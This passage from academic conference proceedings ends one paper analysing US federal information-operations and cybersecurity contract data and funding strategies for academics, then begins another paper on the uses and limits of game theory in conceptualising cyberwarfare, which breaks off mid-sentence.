There are several emerging areas involving the “social” and risk management aspects of IA/IO.<br />
Clearly, “social” is used here to mean relationships among groups of agents, individual or<br />
organizations that involve proprietary information. At the firm level, there is a need to assure individual<br />
firms that their partners, suppliers, or any organization they communicate with over the Internet are<br />
trustworthy to a defined level acceptable to upper management. The economic benefit of securing all<br />
members of the business group is significant. At the individual level there is growing demand to<br />
secure interpersonal communications involving proprietary information (marketing, strategy and<br />
planning, budgets or financial), email, data and image exchanges, instant messaging, etc. This is also<br />
an area of vital national interest to DoD and other Federal agencies.<br />
In addition, the global environment influencing customers as well as the Federal and Commercial IA<br />
segments is characterized by significant stress. Negative pressure from the environment that Federal<br />
and Commercial organizations must perform under has increased significantly since 2007. The United<br />
States government (USG) and the global international community, nation states, state-sponsored<br />
nongovernment organizations (NGOs), organizations, groups, and individuals have rapidly moved into<br />
15
Edwin Leigh Armistead and Thomas Murphy<br />
a new and more unstable situation. The Diplomatic, Intelligence, Military, Economic, Cultural/Social<br />
and Environmental factors (includes medical, earthquake, fire, wind and flood, etc) [DIMES-E] are<br />
considerably more powerful. That transition from a relatively steady state into an economically harsh<br />
state is bad enough. A new, transient and poorly understood unsteady state makes prediction of<br />
expected local and global situations uncertain and thus even more stressful. Together, the DIMES-E<br />
factors above mean three things for the future:<br />
Bad actors can be expected to act even worse and previously good actors may act badly<br />
Predicting the actor’s actions and timing will be too complex and uncertain to analyze in<br />
adequate, precise and satisfactory detail<br />
Better analysis and planning for steadily moving to a more stable and less uncertain future is of<br />
paramount importance.<br />
Consistent with this global situation, a shift towards IA and Cyber security is evident in the contracts<br />
data. Defending and assuring ones data, information and knowledge is the first basic step to<br />
managing both the DIMES-E transitions and the bad actors that resulting social stress a rapid<br />
transition brings out.<br />
IO, IW and IA are sometimes also grouped as network and information components of “Cyber War”<br />
(Carr, 2009). Like IO and IA, Cyber War is a term, which includes threats from:<br />
Cyber Attacks,<br />
Cyber Crime,<br />
Cyber Espionage,<br />
Informatized War,<br />
Information War, and<br />
Computer Network Operations<br />
Defending against these threats can potentially save billions of dollars to the USG, business and<br />
international organizations and thus serve to greatly reduce the stresses forcing the three dire<br />
expectations above. The bad actors involved are State, State-sponsored, and Non-State actors who<br />
use the Internet to attack and disrupt both military and civilian organizations. These actors: commit<br />
acts of espionage against Department of Defense and DoD contractor networks. This accelerates<br />
other nation states’ race to achieve parity or near-parity with superior U.S. military technology. They<br />
commit acts of network intrusion into U.S. critical infrastructure, remaining dormant until needed to<br />
delay or stop an imminent U.S. military action against an adversary state. They further commit<br />
espionage against U.S. corporations stealing millions in intellectual property. They also disrupt<br />
national economies and rob banks on an unprecedented scale.<br />
3. Analysis of IO, IW, IA and cyber contracts<br />
As part of this research, the authors conducted a series of searches on a commercial Federal and<br />
DoD business database known as INPUT (INPUT, 2010,) http://www.input.com. This tool is useful in<br />
that it stores all opportunities – past, present and future in archival form and one can search in both a<br />
functional (using multiple keywords) manner as well as an organizational one (across the federal<br />
government). In total, for this paper, searches for types of contracts were made using 13 key words. A<br />
general search on all keywords and separate searches on each individual keyword were run.<br />
Keywords included:<br />
Information Operations (IO)<br />
Information Warfare (IW)<br />
Information Assurance (IA)<br />
Perception Management<br />
Strategic Communications<br />
Psychological Operations (PSYOPS)<br />
Public Diplomacy<br />
Electronic Warfare (EW)<br />
16
Deception<br />
Operations Security (OPSEC)<br />
Cyber Security<br />
Cyber Operations<br />
Cyber Warfare<br />
Edwin Leigh Armistead and Thomas Murphy<br />
In addition, five different contract status categories were reviewed to include the following:<br />
Forecast Pre-RFP (Forecast Pre-Request for Proposal)<br />
Pre-RFP<br />
Post-RFP<br />
Source Selection<br />
Award (contract awarded)<br />
The data was pulled twice at a 12-month period – first in September 2009 and then again in<br />
September 2010, as shown in Tables 1 and 2. These numbers represent the contracts in the INPUT<br />
database either in process (in one of the pre-award states) or already awarded as of the date given in<br />
the table heading.<br />
Table 1: Status of all contracts by contract category as of september 2009<br />
September 2009 Forecast Pre-RFP Post-RFP Source Selection Award Total<br />
Information Operations 58 35 11 15 216 335<br />
Information Warfare 15 16 3 7<br />
100 141<br />
Information Assurance 79 143 22 45 399 688<br />
Perception Management<br />
2 2<br />
Strategic Communications 15 19 1 2 48 85<br />
Psychological Operations 6 2 3 3<br />
37 51<br />
Public Diplomacy 2 1 12 15<br />
Electronic Warfare 52 58 22 39 333 504<br />
Deception 5 7 6 7 46 71<br />
Operations Security 12 4 2 10<br />
48 76<br />
Cyber Security<br />
10 13 1 1 43 68<br />
Cyber Operations 2 2 5 9<br />
Cyber Warfare 1 2 2 5<br />
254 300 75 130 1291 2050<br />
Table 2: Status of all contracts by contract type as of september 2010<br />
September 2010 Forecast Pre-RFP Post-RFP Source Selection Award Total<br />
Information Operations 16 15 3 6 76 116<br />
Information Warfare 4 5 1 5<br />
41 56<br />
Information Assurance 46 70 7 30 290 443<br />
Perception Management<br />
1 1<br />
Strategic Communications 15 10 1 5 61 92<br />
Psychological Operations 8 4 2 3<br />
41 58<br />
Public Diplomacy 3 13 16<br />
Electronic Warfare 13 12 8 9 138 180<br />
Deception 5 7 5 6 56 79<br />
Operations Security 8 13 4 6<br />
62 93<br />
Cyber Security<br />
11 15 3 4 53 86<br />
Cyber Operations 1 1 11 13<br />
Cyber Warfare 1 3 3 5 12<br />
131 151 38 77 848 1245<br />
17
Edwin Leigh Armistead and Thomas Murphy<br />
From the 2010 set of data, we sorted by company name and counted the number of contracts in the<br />
award state (awarded) to each company. Table 3 shows that only 29 out of 341 companies won more<br />
than two awards, and only eight companies won more than 10 awards out of the data reviewed in this<br />
research.<br />
Table 3: Frequency of awarded number of contracts as of september 2010<br />
Awards 1 2 3 4 5 6 8 ≥ 10<br />
# of Companies 242 49 7 7 4 2 1 8<br />
Success of the Awardees could be measured several ways, total number of contracts awarded, total<br />
dollar value of contracts awarded, award $$ per employee, etc. We use a simple measure important<br />
to academic researchers, the total number of contracts, since it is a straightforward measure of their<br />
best sources of opportunities. Using the data on awarded contracts from the INPUT database we<br />
found that the eight corporations that won 10 or greater IO contracts in Table 3 included the following:<br />
Northrop Grumman Corporation 41<br />
Science Applications International Corporation (SAIC) 40<br />
General Dynamics Corporation 20<br />
BAE Systems PLC 19<br />
Lockheed Martin Corporation 19<br />
Booz Allen Hamilton 15<br />
CACI International Inc 15<br />
L-3 Communications Inc 10<br />
This information shows that as IA and IO have matured in the Federal and DoD marketplace, the<br />
competition appears to be centering more and more on the same key players. Knowing the players<br />
who have won the most contracts suggests strategies for entering the fray.<br />
4. Strategies for entering the fray<br />
The academic researcher must deliver at least best practice and more importantly, unique or worldclass<br />
theories, models, products or services to the contract team in order to be successful. This<br />
applies to individual contributions as well as for the products and services they are developing. After<br />
satisfying these basic requirements for success, there are several key strategies for entering the fray<br />
and selecting what aspect of IO, IW or Cyber to work on. Key strategies laid out in our previous paper<br />
in 2007, centered on the following strategies:<br />
Allying Oneself with the Leading Contenders<br />
Developing a Front Runner<br />
Striking out on your Own<br />
In light of the updated contract information and current international situation, in the author’s opinion,<br />
the new key strategies are as follows:<br />
Develop strong relationships with key individuals of those corporations that are consistently<br />
winning IO and IW contracts<br />
Focus on IO/IW areas that have the most contracts (IA and Cyber Security)<br />
Stay aligned with growing areas of interest in the community (e.g. Strategic Communications)<br />
4.1 Developing strong relationships<br />
The eight companies listed earlier have won about 25% of the total IO and IW contracts from our<br />
research data, and there is a good reason for that. IO and IW, like any endeavor, require a certain<br />
amount of expertise in the form of personnel, capabilities and past performance. Government<br />
contracting officers and their technical representatives are, in general, conservative and will often go<br />
with the “tried and true” company that has performed these duties in the past. A good example is<br />
Northrop Grumman who ran the IO Center of Excellence for the Army at Ft Belvoir for an extended<br />
period and were recently also awarded the contract to run the IO Center for the US Marine Corps.<br />
18
Edwin Leigh Armistead and Thomas Murphy<br />
Clearly, a strong relationship with a company which wins numerous contracts offers more<br />
opportunities for teaming on those contracts.<br />
<strong>Academic</strong>s, like the contracting company, should plan to review and update their strategies at least<br />
once a year, and must be ready to adapt to changes in the acquisition requirements (FAR), market<br />
dynamics and technological innovations. The academic can thus align their contributions to the<br />
company’s contracted requirements. The academic team member can assist the company in<br />
establishing and enhancing service offerings, building corporate values, establishing infrastructure to<br />
support corporate vision, and providing synergy by leveraging corporate resource bases.<br />
4.2 Focus on IA and cyber security<br />
Out of all of the areas of IO and IW, it is IA and Computer Security that hold the most promise,<br />
potential and by our research – the reality of income for academic research. Every business and<br />
military organization needs protection for their computer systems. We see a serious present need to<br />
fix a significant Defensive shortfall in the US cyber position, particularly the commercial and civilian<br />
infrastructure areas. Armistead and Clarke (Armistead, 2010; Clarke & Knake, 2010) emphasize the<br />
central and crucial importance of improving Defensive Cyber capability, and of having open debate on<br />
Cyber strategy/planning/policy – similar to the process carried out for nuclear weapons when that<br />
technology emerged 50 years ago.<br />
4.3 Watch Strategic Communications<br />
Strategic Communications (SC) is an area of continuing interest in the USG, in particular to the DoS<br />
and DoD (Armistead L., 2010). SC should also be watched as a candidate for future contract growth.<br />
SC is important because it addresses a much broader, more informed view of the very demanding<br />
DIMES-E world situation the USG faces today. Because the academic community will find a number<br />
of areas in SC to which they can contribute, we include the following background details. As<br />
discussed in our previous paper (Armistead & Murphy, 2007) and by Paul (Paul, 2010), Strategic<br />
Communications refers to five areas with differing but related meanings:<br />
Enterprise level strategic communication<br />
Strategic communication planning, integration, and synchronization processes<br />
Communication strategies and themes<br />
Communication, information, and influence capabilities<br />
Knowledge of human dynamics and analysis or assessment capabilities.<br />
Paul points out that “these five specifications connect to each other logically. Within the broader<br />
strategic communication enterprise, national or campaign level goals and objectives constitute the<br />
inputs to the strategic communication planning, integration, and synchronization processes. Based on<br />
knowledge of human dynamics and analysis or assessment capabilities, these processes transform<br />
and incorporate the communication strategies and themes and provide them to commanders who<br />
employ the various available communication, information, and influence capabilities in pursuit of<br />
desired objectives. The planning, integration, and synchronization processes and knowledge,<br />
analysis, and assessment capabilities continue to be useful to force elements as they broadcast or<br />
disseminate their themes and messages or otherwise engage and appraise the impact of these<br />
activities”. The reader is referred to (Paul, 2010) for details of the following SC elements.<br />
Enterprise level strategic communication is a commonly shared but general understanding of SC;<br />
it refers to a broad range of USG enterprise level activities and their coordination for internal,<br />
national, international or global strategic goals. Enterprise level strategic communication is<br />
therefore too broad to be very meaningful.<br />
Strategic communication planning, integration, and synchronization processes are the set of<br />
processes included under the overly general USG enterprise level use of “Strategic<br />
communication”.<br />
“Communication strategies and themes are strategic communication elements that involve<br />
content and both the inputs and outputs from the strategic communication planning, integration,<br />
and synchronization processes”. This includes national or campaign goals or objectives (inputs)<br />
that planning processes will translate into communication goals and themes (outputs) and<br />
incorporate into plans. However, there is a multilevel application of these elements. The focus on<br />
19
Edwin Leigh Armistead and Thomas Murphy<br />
these elements of strategic communication can be on levels at, above or below the USG<br />
enterprise level. They could involve higher-level international strategic goals and the implied<br />
communication. Alternatively, they could consider objectives and themes in lower level<br />
operational organizations to be coordinated with and communicated by various communication,<br />
information, and influence assets.<br />
Communication, information, and influence capabilities are broadcast, dissemination, and<br />
engagement elements of SC. Communication, information, and influence capabilities include<br />
public affairs, perception management, psychological operations (PSYOP now MISO), defense<br />
support to public diplomacy (DoD to DoS), and civil affairs. These capabilities are thus very broad.<br />
They can be combined with elements of force, such as maneuver conducting civil-military<br />
operations or military police. They might include the interactions of any element of the USG<br />
military, diplomatic or other forces with foreign populations or the prevalence of language and<br />
cultural awareness training across the force. They might include any action or comment by every<br />
deployed diplomatic or military service member.<br />
Knowledge of human dynamics and analysis or assessment capabilities are the fundamental<br />
bases for all the preceding specified activities. In contrast to processes, knowledge, analysis and<br />
assessment are the bases of accurate models for planning effective, efficient, and successful<br />
actions. Knowledge is obtained via media monitoring, media use pattern research, target<br />
audience analysis, and social, historical, cultural, and language expertise, along with other<br />
relevant analytic and assessment capabilities. “Cultural knowledge and audience analysis are<br />
critical for translating broad strategic goals into information and influence goals. Understanding<br />
audiences specifically and human dynamics generally is critical to identifying themes, messages,<br />
and engagement approaches that will lead to desired outcomes. Data collection and assessment<br />
contribute the feedback that allows two-way communication and engagement (rather than just<br />
broadcast) and that also makes it possible to demonstrate and report impact or effect from<br />
communication activities.” (Paul, 2010)<br />
Thus, the academic researcher could contribute SC applications of Business Marketing, Psychology,<br />
Narratives, Political Science, Economics, and many other disciplines.<br />
5. Future areas of research<br />
Several assumptions must be made when determining IA/ IO needs over the next five years. The first<br />
is that the U.S. economy will continue to rebound from the great recession. The second is that the<br />
U.S. will fund continuing IA efforts in the Federal budget. The third assumption is that information<br />
operations will continue to a growth market, thus the continuing need to bolster IA needs,<br />
requirements and solutions. Continued introduction of unique discriminating Security offerings, such<br />
as an integrated set of IO services, will be vital to keeping revenue up in the contracted companies. IA<br />
services price elasticity is based on the demand from the customer base and costs for having<br />
qualified, trained and certified personnel. These personnel allow the contract team to reach critical<br />
mass in Knowledge Management, create a good reputation, and built consistent security teams to<br />
provide IA functions to customers. Given these assumptions, the customer base will remain high and<br />
that their IA needs and requirements, as well as their budgets, will continue to grow. Acquiring and<br />
maintaining personnel to support IA/IO contract teams will continue to be a challenge to employers<br />
and an opportunity for academics.<br />
How will current capabilities and technologies develop and evolve over the next five years? We can<br />
expect the introduction of a host of new technologies presenting opportunities for IT security vendors.<br />
Many of these will be wireless devices, particularly nomadic devices for home and business users.<br />
The expectation is the continued increased blending of technologies, such as is just beginning to<br />
occur in Internet and cable TV technologies. Increasingly, users of computing devices will have<br />
access to a combination of web-based technologies, including traditional HTTP/IP communications,<br />
streaming video, voice over IP (VOIP), global positioning systems and database applications. Users<br />
will be able to seamlessly move between these technologies via increasingly sophisticated user<br />
interfaces and input/output devices. The blending of technologies, along with increased use of<br />
service-oriented architecture (SOA), will increase the need for multi-level and cross-domain security<br />
capabilities. Cross-domain security requirements will increase significantly, as the ability to share data<br />
across SOAs will increase the need for securing privacy and classified data extracted from databases<br />
for use in other applications. Likewise, the DoD trend towards employing SOAs to support net centric<br />
operations will make C&A increasingly difficult. Biometric identification and access control<br />
technologies will be a growth industry, particularly in the area of identity verification technologies for<br />
20
Edwin Leigh Armistead and Thomas Murphy<br />
use by home PC users in eCommerce. Identity theft protection needs will continue to increase, as<br />
criminals develop increasingly sophisticated means of stealing electronic identity data. The need for<br />
technologies to detect spoofing in emails and on websites will continue to grow. Finally, the capability<br />
to perform software verification and validation (V&V) to determine the inherent security of software<br />
code will become an area of increasing significance.<br />
We argued in the Strategies to Entering the Fray section, based on our analysis of current and<br />
expected contracts, that IA and Cyber Defense will receive increasing attention. Armistead and Clarke<br />
(Armistead, 2010; Clarke & Knake, 2010) also emphasizes the central and crucial importance of<br />
improving Defensive Cyber capability, and of having open debate on Cyber strategy/planning/policy –<br />
similar to the process carried out for nuclear weapons when that technology emerged 50 years ago.<br />
We appreciate the need for coverage and analysis of Defensive and Offensive Cyber strategy,<br />
operations and tactics. More importantly, we also see a serious need to fix a significant Defensive<br />
shortfall in the US cyber position. Because there is no agency with responsibility for Defense of<br />
civilian banking, commercial, industrial systems, and because the DoD and the USG partially depend<br />
on the commercial internet, a monumental vulnerability exists. Engaging in conflicts with a good<br />
offense but without a good defense will fail. The nation as a whole now finds itself in that situation.<br />
These factors define additional reasons the authors switched to the Defensive current focus in our<br />
Strategies for Entering the Fray section. Both Armistead and Clarke (Armistead L., 2010; Clarke &<br />
Knake, 2010) outline a process to establish a well-founded strategy-policy-plan and minimize risk of<br />
uncontrolled Cyber-Kinetic War. These analyses suggest several topics, simulations and desktop<br />
exercises, which would be useful to USG contract work. A well-founded analysis must address our<br />
overall Strategy and Political situation, with military and cyber strategy as a component of national<br />
strategy.<br />
A difficult area needing both theoretical and practical development is formulating Measures of<br />
Performance [MOP] and Measures of Efficiency [MOE] (Tokar, 2010). This is a focus area of military<br />
effects based (EB) planning. Roughly, when carrying out missions involving the application of<br />
components of IO, IW, Cyber, etc., we need to measure if we are “doing the right things” to effectively<br />
achieve our desired goals [MOP] and if we are efficiently “doing things right” [MOE] to not waste time,<br />
$, equipment and people. A related concept in the business world, which will be increasingly<br />
importance as USG and DoD budgets narrow, is Return on Security Investment [ROSI]. The difficulty<br />
with these ideas is in measuring the impact of one component alone when multiple different initiatives<br />
are brought to bear. How one separates the effects of one from the combination of all is directly<br />
related to the model of the complex DIMES-E processes being used.<br />
Finally, the need for new and improved models of complex, DIMES-E systems is the most<br />
fundamental barrier to achieving success, performance and efficiency. The benefits from such<br />
insightful theory and models will be similar to the leap forward in physical sciences resulting from<br />
Newton’s or Kepler’s Laws. If we are to more simply and accurately understand, predict and act to<br />
bring about a desired future, and if we are to be able to tease out the effects of one factor (e.g. SC,<br />
MISO, etc.) from the effects of many, then we must discover and apply much more insightful theories<br />
and mathematical models to DIMES-E systems. Such models can clarify the attribution of who and<br />
what is really at work and how to anticipate and adjust to the situation. This will allow everyone,<br />
leaders and members of governments and organizations alike, to move beyond simply knowing they<br />
are in serious hardship or risk, to appreciate what is being done right and what is not, and act to bring<br />
about a more desirable future rather than an expected undesirable future.<br />
6. Summary<br />
Our overall goal has been to provide both the sources of funding opportunity for academic<br />
researchers as well as sufficient background to understand the strategies for acquiring funding from<br />
those sources. We first described the intuition and insight into the motivation of players, relationships<br />
and integrated influences in the IA and IO business growth areas. In particular, we noted the<br />
important influence of stress from external conditions and global DIMES-E situations. The ability to<br />
understand and address these integrated problem areas is fundamental to an academic’s funding<br />
success. Based on an analysis of contracts up to September 2010, we noted a current focus on IA<br />
and Cyber security. We concluded that IA and Cyber Security are areas that should and will continue<br />
to receive contract funding. Next, we further analyzed current and historical IO, IW, IA and Cyber<br />
contracts and identified which companies have been awarded more contracts to date and are thus<br />
“opportunity targets” for academic consulting. We provided details of strategies to enter the contract<br />
21
Edwin Leigh Armistead and Thomas Murphy<br />
fray, suggesting that understanding the contract, the contractor and developing strong relationships<br />
with contractors is essential. We give substantial details on how and why one develops strong<br />
relationships. We call attention to the area of Strategic Communications as a possible future area of<br />
opportunity given the broader scope of integration and application of security contract focus. Finally,<br />
we mention several future areas of research, giving the assumptions made as well as details of<br />
selected difficult but very important technical, complex predictive modeling and MOE/MOP areas that<br />
need to be solved.<br />
References<br />
Armistead, E., & Murphy, T. (2007). The Evolution of Information Assurance and Information Operations<br />
Contracts across the DoD: Growth Opportunities for <strong>Academic</strong> Research. ICIW <strong>Conference</strong>. Monterey, CA.<br />
Armistead, L. (2010). Information Operations Matters - Best Practices. Washington, D.C.: Potomac Books, Inc.<br />
Carr, J. (2009). Inside Cyber Warfare. O'Reilly.<br />
Clarke, R. A., & Knake, R. K. (2010). Cyber War - The Next Threat to National Security and What to do About It.<br />
New York, NY: HarperCollins.<br />
INPUT. (2010). INPUT database, INPUT. Retrieved 2010, from "The Authority on Government Business"<br />
[Online]: http://www.input.com<br />
Paul, C. ( 2010). “ Strategic Communication” Is Vague, Say What You Mean. Joint Forces Quarterly, Issue 56 .<br />
Tokar, J. (2010). Assessing Operations:MOP and MOE Development. IO Journal, Vol. 2, Issue 3 , 25-28.<br />
22
The Uses and Limits of Game Theory in Conceptualizing<br />
Cyberwarfare<br />
Merritt Baer<br />
Harvard Law School, Cambridge, USA<br />
mbaer@post.harvard.edu<br />
Abstract: In cyberwarfare, there are obstacles to reaching minimax stasis: unlike in checkers, game theory<br />
cannot follow each decision path to its conclusion and then trace the right decisions back. However, I contend<br />
that because the rational predictability of game theory will continue to drive decisions and seek out patterns in<br />
them, game theory may identify (and intelligently weight) nodes of a decision tree that are not immediately<br />
recognizable to or favored by human decision-makers. While we can‟t create a network that is maximally<br />
resistant to random faults and maximally resistant to targeted faults, we can take into account the particular<br />
weaknesses and likelihoods of attack so that the weaknesses overlap in resistant ways-- ways that correspond to<br />
risk preferences and security priorities. Moreover, using game theory to make a security strategy that is a<br />
calculated derivative of mapped potential outcomes will help us to avoid human biases and to respond to threats<br />
proportionately/economically. Rather than a process of continual growth, cyber evolution, like biological evolution,<br />
seems more aptly characterized as punctuated equilibrium—periods of relative stasis followed by quick, drastic<br />
periods of breakthrough. Reaching Nash equilibrium is unlikely in the cyberwar context because under unstable<br />
conditions, evolutionarily stable strategies don‟t run a typical course. While there may be no set of moves that is a<br />
“solution” in cyberwar strategy, game theory allows human decisionmakers to intelligently identify and weight<br />
decision paths to transcend cognitive biases. This paper seeks to change the way of thinking about cyberwar--<br />
from one of stockpiling weapons, to one of looking for patterns-- thinking about the problem of cyber insecurity<br />
more holistically. The paper challenges some of the myopia in thinking about cyber in existing "warfare" terms<br />
and proposes that organic models‟ tendency toward game theoretic equilibrium may help us conceive of the<br />
cyberwar decisionmaking landscape more effectively.<br />
Keywords: cyberwarfare, game theory, layered defense, Nash equilibrium<br />
1. Introduction<br />
In this paper I explore the applications and limitations of game theory to cyberwarfare at a conceptual,<br />
not case study, level. My focus is on federal strategy—especially the United States Department of<br />
Defense (DoD)—so I do not focus on addressing cybercrime or cyberattack that has as its purpose<br />
money or a local, ideological message, or even those with cyber -terrorist or -anarchist goals. My<br />
focus is on large-scale acts of war aimed at military, governmental or infrastructural targets that<br />
currently only certain nation-states are likely to be able to execute, thus the other “players” in the<br />
game are nation-state-level actors.<br />
I recognize that cyberwarfare is among the rarer forms of online violence in comparison with other<br />
forms of cybercrime, but its high stakes and opportunities for more contained strategic study attracted<br />
my focus. For the purposes of this paper, I assume we have available all existing sophisticated game<br />
theoreticians, human or computerized.<br />
I find that game theory is useful to the extent that it allows us to transcend some of our systemspecific<br />
biases (based on established or institutional ways of approaching problems) and threatspecific<br />
biases (rooted in evolutionarily-derived disproportionate reactions to certain threats). Game<br />
theory can allow us to weigh the nodes of the decision tree more accurately; it is not a solution as<br />
such, but a tool for holistic cyberwarfare strategy.<br />
2. Background: Nash equilibrium and complications to game-theoretical<br />
stasis in the cyber context<br />
Game theory scholars have written, though not extensively, on the application of game theory to<br />
information warfare. (See, e.g., Hamilton et al, “The Role of Game Theory in Information Warfare” and<br />
“Challenges to Applying Game Theory to Information Warfare”). The US Cyber Consequences Unit<br />
(US-CCU) claims it primarily employs an analytic method called “Value Creation Analysis” that<br />
“draws…broadly on cooperative game theory.” (See US-CCU website, "http://www.usccu.us/"<br />
http://www.usccu.us/).<br />
Two-player stochastic games may be useful in the escalation context (deciding whether to launch a<br />
preemptive attack or responding to an attack could be a two-player interaction). A study by SPIE has<br />
23
Merritt Baer<br />
refined the metrics for estimating impact and intent of cyberattack, and applies Markov game theory, a<br />
stochastic approach. (Shen et al. 2007) However the two-player stochastic model is not valid any time<br />
when more than one player is involved, and this is the more likely scenario— as in the case of a<br />
generalized security model that would account for more than one player as a potential threat, or a<br />
model that includes potential alliances.<br />
The minimax solution in zero-sum games is Nash equilibrium (where each player is at her optimal<br />
level, taking into account the other players' strategy). There exists “at least one Nash equilibrium,<br />
possibly involving mixed strategies, for any normal- form static game with a finite number of players<br />
and strategies” (Jamakka, 2005:14). However, in cyberwarfare, there are obstacles to reaching<br />
minimax stasis: there is no assumption that it is a zero-sum game (power may exist relative to others<br />
but in cyber there can be emerging forms of power and there may be no clear endpoint that signifies<br />
“winning”); there may be more than two players; players may make simultaneous and overlapping<br />
moves (instead of taking turns like in chess); and there is no valid assumption of perfect information<br />
(one‟s minimax strategy may depend on knowing the capabilities of the other players).<br />
Moreover, the possibility of alliances disrupts Nash equilibrium because if players can agree on<br />
strategies different from minimax, they may achieve higher payouts. The classic example of this is a<br />
cartel manipulating the market; in the cyber realm, it could take the form of inter- national or even nonnationstate<br />
collaboration among players. U.S. vulnerability to alliance-making by other players is<br />
accentuated by the fact that we have more to lose— our government and our private-sector cyber<br />
capabilities/ data are overall more valuable than other countries' (Hathaway, 2009:16).<br />
Some, including former Department of Homeland Security Secretary Michael Chertoff (in Espiner<br />
2010) compare nuclear strategy to cyber strategy. However, cyber weapons defy nuclear game<br />
theoretic strategy because cyber weapons are amorphous and can be pinpointed— used as a scalpel<br />
instead of, or as well as, a hammer. Even cyber weapons that are clearly war-oriented, like Stuxnet,<br />
can be more controlled and monitored in use than nuclear weapons, may take time to detect and may<br />
cover the executor‟s tracks. Unlike the nuclear arena, in which even those with capabilities have so far<br />
resisted employing nuclear weapons, cyberwar weapons have been and will continue to actually<br />
come into use—but in nuanced and creative ways that elude traditional definitions of use of force,<br />
weapons, or war.<br />
For all these reasons, it seems likely that we cannot use game theory in the traditional method of<br />
modeling the game‟s endpoints and then reversing the moves that would lead to stasis, because we<br />
may never reach equilibrium. This is another way of saying that the game may have multiple Nash<br />
equilibria-- “Game theory cannot necessarily predict the outcome of a game if there are more than<br />
one Nash equilibriums [sic] for the game. Especially when a game has multiple Nash equilibriums [sic]<br />
with conflicting payoffs...” (Jamakka et al., 2005: 14). If the parties do not reach stasis then by<br />
definition the game will continue because players have an incentive to change their decision--it is only<br />
at equilibrium that (optimal payout exists and therefore) there is no incentive to change decisions.<br />
Accordingly, this paper‟s analysis begins from an acknowledgment that in cyberwar, there may be no<br />
“solution.” In cyberwar, unlike in checkers, game theory cannot follow each decision path to its<br />
conclusion and then trace the right decisions back. The “right decisions” may evolve and the endpoint,<br />
if there is one, is unknown. However, game theory continues to be useful in cyberwar strategy<br />
because the rational predictability of game theory will continue to drive decisions and seek out<br />
patterns in them, and because game theory may identify and intelligently weight nodes of a decision<br />
tree that are not immediately recognizable or historically favored by human decision-makers.<br />
The paper begins by acknowledging a number of ways in which cyberwar defies traditional game<br />
theory models. It describes why a biological model is the most useful analogy, including the<br />
epidemiological response to invasion and the evolutionary tendency toward equilibrium. Then it<br />
explores the benefits of game theory, describing ways in which it is a uniquely useful tool for<br />
cyberwarfare strategy as an ongoing set of decisions in a changing set of conditions.<br />
24
3. Limits to using game theory<br />
3.1 The economics of cyber insecurity<br />
Merritt Baer<br />
Game theoretical explorations assume perfect rationality, but economically, there are a number of<br />
ways in which the current cybersecurity system lacks the incentives to operate at what might be<br />
termed “rational” full strength. One is the problem of externalities-- like air pollution, most individuals<br />
underinvest in their own security out of a perception that the problem (and its solution) does not target<br />
them directly. (Anderson and Moore 2006). This emerges in many contexts where vulnerabilities are<br />
not clearly attributable to the responsible actor; Daniel Geer, Chief Information Security Officer of the<br />
Central Intelligence Agency‟s venture capital fund In-Q-Tel, (2010) struck a comparison to the<br />
evolution of laws that would enforce responsibility for cleaning up a toxic waste spill and dealing with<br />
those affected by it. Personal underinvestment in security means vulnerability to botnet appropriation<br />
of computers, as well as facilitation of anonymity-inducing programs like Tor, which allow a hacker to<br />
stage a virtually untraceable attack. (See, e.g., Wilson 2008). Computers under remote botnet control<br />
are growing at an average of 378% each year, according to grassroots security monitoring<br />
organization Project Honey Pot; this translates to ease of launching denial-of-service (DDoS) attacks<br />
and decreased likelihood of tracing an attack. The DDoS attacks—both against Wikileaks (Carney<br />
2010) and against its detractors (Reuters 2010) --made use of those who passively or voluntarily<br />
submitted their computers to botnet control.<br />
Internet founder Vint Cerf (in Schofield, 2008) made the Hobbesian observation that “[i]t seems every<br />
machine has to defend itself. The Internet was designed that way. It‟s every man for himself.” The<br />
Internet may require individuals to self-protect, but it wasn‟t “designed” for individuals to take the reins<br />
in security—it was simply not designed for security. It is designed, to the extent that one can say it<br />
was designed, for openness. Security may fall to individuals but the current structure doesn‟t provide<br />
the necessary incentives for them to make that investment. Game theoretical assumptions about<br />
rationality are thrown off by the human tendency to underinvest when there are externalities. As<br />
software engineer Brad Shapcott famously said, “The Internet isn‟t free. It just has an economy that<br />
makes no sense to capitalism.”<br />
Re-aligning incentives to prioritize an optimal level of individual cybersecurity investment is an<br />
economics task, but no one has ownership of the problem or the impetus to even get robust<br />
information about it. As Jonathan Zittrain (Harvard Law 2010) stated, “Because no one owns this<br />
problem, no one is paying for monitoring software to get the picture they need, to be accurate.”<br />
Contrastingly, in the private sector economic objectives often reward security—such as the case study<br />
of the US banking industry compared with the UK banking industry. In US bank security, credit card<br />
fraud has been the responsibility of the bank. UK banks initially refused responsibility for ATM error,<br />
and it created a “moral hazard” incentive for bank employees to act carelessly. (Anderson and Moore<br />
2006: 610-613).<br />
On a higher level of abstraction, there are externalities because of government reliance on private<br />
sector cybersecurity technology. When this reliance couples with any tolerance for inefficiency, such<br />
as those that result from revolving door corruption or transparency concerns, it constricts the<br />
competitiveness of government contract assignment. This produces high-level inefficiencies. (See<br />
Baram 2009). According to a study by the Center for Public Integrity, only about one-third of Pentagon<br />
contracts were awarded following competition between two or more bidders. (Calbreath 2005). The<br />
cost premium of outsourcing defense contracts to private sector providers is only justified by the<br />
innovation push that the private sector is assumed to have; if government-to-company contracts are<br />
instead funneled through sole-source contracts, this innovation advantage assumption may not be<br />
valid, and the price premium may not be justified. (See Arnold, S. A. et al., 2009: 25). Small levels of<br />
distorted investment can produce large results in absolute terms because the numbers are so large--<br />
the total investment in research, development, test and evaluation (RDT&E) and procurement funds<br />
for the DoD major defense acquisitions portfolio is a staggering $1.6 trillion yearly (GAO Report 2009).<br />
3.2 Imperfect competition and the investment-to-security payout<br />
Companies are moved by (and have a legal fiduciary duty to prioritize) their own bottom line; there is<br />
no independent incentive to collaborate toward producing high-quality security products. Thus at the<br />
federal level, great dependency on private contractors in the cyber weapons arena can distort cost<br />
efficiency calculations in game theory. Our investment in security may not lead linearly to a higher-<br />
25
Merritt Baer<br />
security end-result, as is presumed by security-investment-level calculations. See, e.g., Schavland,<br />
Chan and Raines (2009:629): “Our model places a dollar valuation on the insurance we are willing to<br />
purchase for information security." Yet the assumption of a linear connection between investment and<br />
security is generally inaccurate. Karen Evans, Administrator for Electric Government and Information<br />
Technology, Office of Management and Budget (2007), emphasized in a statement to a congressional<br />
subcommittee that when it comes to e-security, neither high spending nor high regulatory compliance<br />
translate directly to actual higher security.<br />
Because of the private sector‟s lack of incentives to collaborate, coupled with private companies‟<br />
